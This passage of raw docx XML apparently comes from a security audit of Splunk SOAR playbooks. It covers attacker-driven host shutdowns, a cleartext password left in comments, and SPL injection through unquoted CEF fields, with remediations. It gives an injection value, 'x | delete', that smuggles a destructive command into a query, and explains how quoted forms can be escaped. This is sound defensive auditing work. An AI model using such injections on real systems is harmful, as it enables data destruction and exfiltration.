      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shutdown now</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:507</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (block+shutdown); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internal_host_winrm_log4j_respond.py:438</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (New-NetFirewallRule block), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:473</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shutdown /f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:508</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (block+shutdown). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The quarantine/shutdown actions operate on the deduplicated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ip_or_hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> list, which is attacker-chosen. Although a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prompt2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gate exists (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:319-358</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>list of hosts to act on is populated from CEF data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so an attacker who can inject a critical server's hostname into the artifact set can induce an analyst (who sees only a hostname list) to blanket-shutdown or network-isolate production hosts — a self-inflicted DoS. The deletion branch's command is also the injection sink of PB2-02/03. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (requires analyst to confirm, but the decision is made on attacker-chosen host names with no asset-criticality guardrail). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: covered by PB2-02/03 PoC output (the hostnames/paths acted on are attacker-controlled). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: before presenting the quarantine prompt, cross-reference each host against an ES asset-criticality / protected-asset allow-list and refuse to shut down </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pci_domain</w:t>
      </w:r>
      <w:r>
        <w:t>/high-priority assets; show the analyst the asset criticality next to each host; require per-host (not blanket) confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-285 Improper Authorization; CWE-640. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1531 Account Access Removal, T1489 Service Stop. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-3 Access Enforcement, CM-5 Access Restrictions for Change. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control, RS.MI Respond - Incident Mitigation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.2 Privileged access rights. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-08 — Cleartext new password written into a SOAR container comment and action output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.5). Exploitability: Exploitable by any container reader.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/activedirectory_reset_password.py:141-147,153-166</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:141-147</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>add_comment_pwd_reset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.comment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:156</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>template = """Reset user {0} password to {1}"""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>generate_password:custom_function:strong_password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: After the reset, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>plaintext new password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is written into a SOAR container comment (and the JSON action output </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>action_result.parameter.new_password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, confirmed in the asset output spec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>example_values: ['abc@123']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Anyone with read access to the container/event — a broad set of SOC users and any integration that exports containers — sees the live AD credential. It also persists in SOAR audit history indefinitely. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the password is secret data at rest. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitable by any container reader</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (information disclosure). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: template renders </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Reset user jdoe password to aB3$kR9!...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into a persistent comment. (See the JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cells[15].template</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"Reset user {0} password to {1}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: never log the password. Comment only that a reset occurred and deliver the password out-of-band (e.g. prompt the user to set it on next logon, or send via a secrets channel):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>template = "Reset password for user {0}. New password delivered out-of-band; user must change at next logon."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>parameters = ["artifact:*.cef.compromisedUserName"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-532 Insertion of Sensitive Information into Log File; CWE-312 Cleartext Storage of Sensitive Information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures, A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1552.001 Unsecured Credentials: Credentials In Files. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AU-9 Protection of Audit Information, IA-5 Authenticator Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.12 Data leakage prevention. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-06 — SPL injection via untrusted CEF fields in Splunk run query templates (multiple playbooks)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.3). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/internal_host_splunk_investigate_log4j.py:28,55,82,109; risk_notable_protect_assets_and_users.py:222,253; risk_notable_import_data.py:77; Splunk_Identifier_Activity_Analysis.py:87,120,152,184; Splunk_Message_Identifier_Activity_Analysis.py:47; Splunk_Notable_Related_Tickets_Search.py:51</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">into SPL, later run via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.act("run query", assets=["splunk"])</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internal_host_splunk_investigate_log4j.py:28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>notable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> | search dest={0} </w:t>
      </w:r>
      <w:r>
        <w:t>` (unquoted),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:55</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search dest = {0}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:82</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search dest = {0}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:109</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>asset IN ("{0}")</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>risk_notable_protect_assets_and_users.py:222</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>asset IN ("{0}")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:253</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>identity IN ("{0}")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (host/user from artifacts).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>risk_notable_import_data.py:77</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search risk_object="{0}" risk_object_type="{3}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (risk_object).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Splunk_Identifier_Activity_Analysis.py:87,120,152,184</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (url/file/domain/ip into tstats </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IN (...)</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Splunk_Message_Identifier_Activity_Analysis.py:47</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (message_id/subject/src_user into Email datamodel).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Splunk_Notable_Related_Tickets_Search.py:51</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>notable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> | search _raw IN ({0}) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:t>{0}=*term*`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Each template substitutes an attacker-chosen value into an SPL string. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dest={0}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> form (log4j splunk investigate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>unquoted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so a value like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>x | delete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> breaks straight into a new pipeline stage. The quoted forms (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IN ("{0}")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search _raw IN (…)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) are escapable by embedding a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The effective privilege is that of the Splunk asset service account; ES/ESCU deployments commonly grant it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>collect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outputlookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, enabling index tampering, lookup poisoning, or data exfiltration via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sendemail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
